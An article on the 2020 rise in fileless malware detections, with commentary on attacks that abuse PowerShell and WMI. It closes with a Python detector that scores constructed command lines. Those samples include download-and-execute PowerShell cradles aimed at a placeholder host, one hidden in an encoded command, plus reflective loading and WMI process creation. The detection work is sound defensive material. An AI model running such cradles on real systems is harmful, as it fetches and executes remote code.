Why Is Fileless Malware Surging?

According to network security vendor WatchGuard Technologies' Internet Security Report, fileless malware detections increased 888 percent year-on-year in 2020.

Hackers turned to fileless malware to conduct attacks without installing malicious code so they can hide from traditional security controls.

Popular toolkits such as PowerSploit and Cobalt Strike allow cybercriminals to inject malicious code into running processes, so the code keeps running even if the original script is identified and removed.

Hackers are also using encryption to hide their malicious activity. According to WatchGuard, 47 percent of attacks detected at the network perimeter in the fourth quarter were encrypted.

In addition, malware delivered via HTTPS increased 41 percent and encrypted zero-day variants increased 22 percent over the third quarter.

Network attack detections increased five percent in the fourth quarter to the highest level in two years. Total unique attack signatures also increased four percent in the fourth quarter of 2020.

With the value of digital currency on the rise, 25 percent more cryptocurrency mining malware was detected in 2020 than in 2019.

Ransomware, by contrast, declined for the second year in a row, from an all-time high of 5489 unique payloads in 2018 to 2152 unique payloads in 2020. Even so, WatchGuard stated that these variants likely infected hundreds of thousands of endpoints globally.

WatchGuard Technologies used data from its Firebox Feed, internal and partner threat intelligence, and a research honeynet for the report. Phil Muncaster "Fileless Malware Detections Soar 900 Percent in 2020" infosecurity-magazine.com (Mar. 30, 2021).

Commentary

Fileless malware does not rely on a malicious executable written to disk the way a traditional malware attack does. Instead, it takes advantage of legitimate tools that are already part of the operating system.

Fileless malware uses trusted processes, such as Microsoft Office macros, PowerShell, and WMI, to perform malicious activities including lateral movement, privilege escalation, evasion, reconnaissance, and payload delivery. Allie Mellen “Fileless Malware 101: Understanding Non-Malware Attacks” www.cybereason.com (Sep. 17, 2019).

Fileless malware creates more problems for employers by spreading easily and causing more damage through its ability to hide from antivirus protections. Detecting and preventing fileless malware is challenging because hackers hijack tools that they know are pre-installed on every Windows device and are part of the daily workflow.

Because there is no malicious executable on disk, there is no file signature for antivirus software to match. As far as virus protections are concerned, trusted tools are running as they should. As a result, fileless malware attacks are becoming more prevalent.
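The commentary's point is that file-signature scanning sees nothing when the attacker's code lives only in PowerShell or WMI command lines and in memory, which is why defenders turn to behavioural telemetry instead: process-creation command lines and PowerShell script-block logging. The example below is added here and is not code from the article, from WatchGuard, or from Cybereason. It scores a handful of constructed command-line strings (shaped like Windows process-creation and PowerShell ScriptBlock text, not real data) against weighted heuristics for the patterns the article names: hidden windows, encoded commands, download-and-evaluate cradles, in-memory assembly loading, and WMI process creation. The rule names, weights and threshold are assumptions chosen for the demonstration. The one non-obvious step is decoding a `-EncodedCommand` blob (base64 of UTF-16LE) before matching, since the cradle is invisible in the raw command line.

```python
import base64
import re

# Constructed sample telemetry for the demo: strings shaped like Windows process
# command lines / PowerShell ScriptBlock text. None of it is real data from the report.
_CONSTRUCTED_STAGE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
_CONSTRUCTED_BLOB = base64.b64encode(_CONSTRUCTED_STAGE.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    # routine admin script run: ExecutionPolicy Bypass alone is weak evidence
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    # hidden window + encoded command; the download cradle is only visible after decoding
    "powershell.exe -nop -w hidden -enc " + _CONSTRUCTED_BLOB,
    # benign inventory one-liner
    "Get-ChildItem C:\\Users | Export-Csv C:\\temp\\users.csv",
    # in-memory .NET assembly load followed by Invoke-Expression of a second stage
    "[System.Reflection.Assembly]::Load($bytes); Invoke-Expression $stage2",
    # WMI used to spawn a hidden PowerShell that pulls and evaluates remote code
    "wmic process call create \"powershell -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')\"",
]

# Heuristic rules (name, pattern, weight). Weights and the threshold are assumptions
# made for this example, not values from any vendor product or the article.
RULES = [
    ("encoded_command", re.compile(r"-(?:e|ec|enc|encodedcommand)\s", re.I), 2),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2),
    ("download_cradle", re.compile(r"\b(?:downloadstring|downloadfile|invoke-webrequest|iwr)\b", re.I), 3),
    ("invoke_expression", re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 2),
    ("reflective_load", re.compile(r"reflection\.assembly\]::load", re.I), 3),
    ("wmi_process_create", re.compile(r"wmic\s+process\s+call\s+create|win32_process.*\bcreate\b", re.I), 2),
    ("profile_or_policy_bypass", re.compile(r"-nop\b|-noprofile\b|-ep\s+bypass|-executionpolicy\s+bypass", re.I), 1),
]
SUSPICIOUS_THRESHOLD = 4

# -EncodedCommand and its short forms, followed by a base64 blob
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline):
    """Return (cmdline with the base64 blob replaced by a placeholder, decoded script or None).

    The placeholder keeps the rules from matching inside the base64 text by accident;
    the decoded script is matched separately so hidden indicators are surfaced.
    """
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline, None
    visible = cmdline[: m.start(1)] + "<encoded>" + cmdline[m.end(1):]
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        decoded = None  # not valid base64 / UTF-16LE: the flag still counts, nothing to inspect
    return visible, decoded


def analyze(cmdline):
    """Score one command line; each rule counts once whether it hits the visible or decoded text."""
    visible, decoded = decode_encoded_command(cmdline)
    texts = [visible] + ([decoded] if decoded else [])
    matched = {}
    for name, pattern, weight in RULES:
        if any(pattern.search(text) for text in texts):
            matched[name] = weight
    score = sum(matched.values())
    return {
        "event": cmdline,
        "decoded": decoded,
        "rules": sorted(matched),
        "score": score,
        "verdict": "suspicious" if score >= SUSPICIOUS_THRESHOLD else "benign",
    }


def triage(events):
    """Analyze a batch of command lines and return one result dict per event."""
    return [analyze(event) for event in events]


if __name__ == "__main__":
    for result in triage(SAMPLE_EVENTS):
        print(f"{result['verdict']:10} score={result['score']:2} rules={','.join(result['rules']) or '-'}")
        if result["decoded"]:
            print(f"           decoded: {result['decoded']}")
```

Run as-is, the routine `-ExecutionPolicy Bypass` script and the inventory one-liner score as benign, while the encoded command, the reflective load, and the WMI-spawned cradle cross the threshold. The design choice worth copying is the split between visible and decoded text: a rule that only inspects the raw command line would see `-enc` and `-w hidden` but miss that the payload is a download cradle, which is exactly the kind of hiding the article describes.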
